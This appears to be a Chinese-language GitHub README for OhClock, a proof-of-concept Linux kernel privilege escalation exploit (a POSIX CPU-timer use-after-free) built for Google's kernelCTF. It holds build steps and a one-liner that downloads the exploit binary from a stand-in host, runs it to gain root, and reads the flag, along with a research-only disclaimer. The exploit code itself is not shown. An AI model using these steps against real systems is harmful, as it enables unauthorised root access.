shxve/OhClock

GitHub: shxve/OhClock

OhClock 是一个利用 Linux LTS 内核 POSIX CPU 定时器 UAF 漏洞实现本地提权的 PoC 利用代码。

Stars: 0 | Forks: 0

# OhClock OhClock 是一个针对 Linux LTS 内核的 0/1 day 本地提权漏洞利用,通过 POSIX CPU-timer 的释放后使用(use-after-free)漏洞,从无特权的受限 shell 提权至 root。 专为 Google kernelCTF 最新实例(`lts-6.12.95`)及其双 vCPU Intel Xeon Platinum 8481C 实例构建和调优。 感谢 X 上最近的一篇帖子让我们发现了这个漏洞 :) 将其变为通用的 LPE 就留给读者作为练习吧 ;) 作者:Pietro Foroni 和 Dan。 ## 概念验证 [![OhClock 概念验证](https://asciinema.org/a/y5K12hlmd4RL4t0M.svg)](https://asciinema.org/a/y5K12hlmd4RL4t0M) ## 构建 ``` make ``` 将该二进制文件公开到实例可访问的 endpoint: ``` python3 -m http.server 8000 ``` ## 运行 现在让我们在 Google 的 kernelCTF 实例上捕获 flag 吧!! 使用 [kernelCTF 规则](https://google.github.io/security-research/kernelctf/rules.html) 中发布的证书进行连接: ``` nano server_cert.pem socat - ssl:kernelctf.vrp.ctfcompetition.com:1337,cafile=server_cert.pem ``` 选择 `lts-6.12.95`,然后选择 `run`,在实例内部执行: ``` cd /tmp && wget -q http://yourhost:8000/exploit -O exploit && chmod +x exploit && CORE_WRITE_ATTEMPTS=3600 ./exploit ``` 成功后: ``` id cat /flag ``` ## 免责声明 本项目仅出于安全研究和教育目的发布。 它针对的是一个已在上游修复的漏洞(`920f893f735e`,2026-07-05)。 请仅在你拥有或明确获得授权测试的系统上使用。作者不对任何滥用行为或该漏洞利用可能造成的任何损害承担责任。
标签:Bing搜索, Linux内核, Web报告查看器, 安全渗透, 客户端加密, 提权, 本地提权